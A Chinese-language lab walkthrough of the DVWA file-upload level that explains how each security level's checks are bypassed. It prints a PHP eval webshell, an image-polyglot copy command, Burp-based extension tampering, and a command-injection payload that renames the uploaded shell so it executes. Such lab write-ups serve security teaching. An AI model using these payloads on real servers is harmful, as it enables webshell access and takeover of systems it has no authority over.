第五关 File Upload(文件上传漏洞)
File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限
low
low等级没有任何的防护
创建一个test.txt文件,输入下面一句话木马
<?php @eval($_POST['666']); ?>
然后改后缀名为.php,变成php文件,然后就上传该文件,返回一个路径
打开蚁剑连接,url就是根路径拼接上返回的路径
medium
这一关对文件类型和大小进行了限制,只能是jpg或者png格式文件,并且文件大小不能超过100000字节
上传刚才的php文件,提示只能上传jpeg或者png格式
那我们就把后缀改成jpg再上传,发现成功了,并且给出了上传的路径
继续用蚁剑连接,发现虽然上传成功,但是无法连接成功,单纯的图片马并不能直接和蚁剑连接,因为该文件依然是以image格式进行解析,只有利用文件包含漏洞,才能成功利用该木马
所以我们要换一个方法绕过前端的检测,我们选择test.jpg上传,然后burp suite抓包,把后缀名改成.php即可绕过前端的检测,上传一个test.php文件
上传成功了
这回连接成功了
high
查看源码,High级别的代码读取文件名中最后一个”.”后的字符串,期望通过文件名来限制文件类型,因此要求上传文件名形式必须是”.jpeg” 、”.png”之一。同时,getimagesize函数更是限制了上传文件的文件头必须为图像类型。发现仅仅后缀是图片格式的还不行,文件内容必须还得是图片格式的。getimagesize(string filename)函数会通过读取文件头,返回图片的长、宽等信息,如果没有相关的图片文件头,函数会报错
我们找一张小一点的图片,和shell.php文件放在一起,同路径下输入cmd打开命令输入
copy 1.png /b + shell.php /a shell.jpg
成功创建一个shell.jpg文件
打开这个图片看,我们的php代码已经拼接到后面了
然后上传该文件
此时由于图片马中的php代码并没有被解析,所以不能直接使用蚁剑进行连接,这里可以通过命令注入漏洞将文件名改为php
打开命令注入漏洞的low等级,输入下面内容
127.0.0.1 |rename ..\..\hackable\uploads\shell.jpg shell.php
然后shell.jpg就被改成了shell.php
接下来就用蚁剑连接即可
impossible
可以看到,Impossible级别的代码加入Anti-CSRF token防护CSRF攻击,对上传文件进行了重命名为md5值,同时对文件的内容作了严格的检查,导致攻击者无法上传含有恶意脚本的文件。
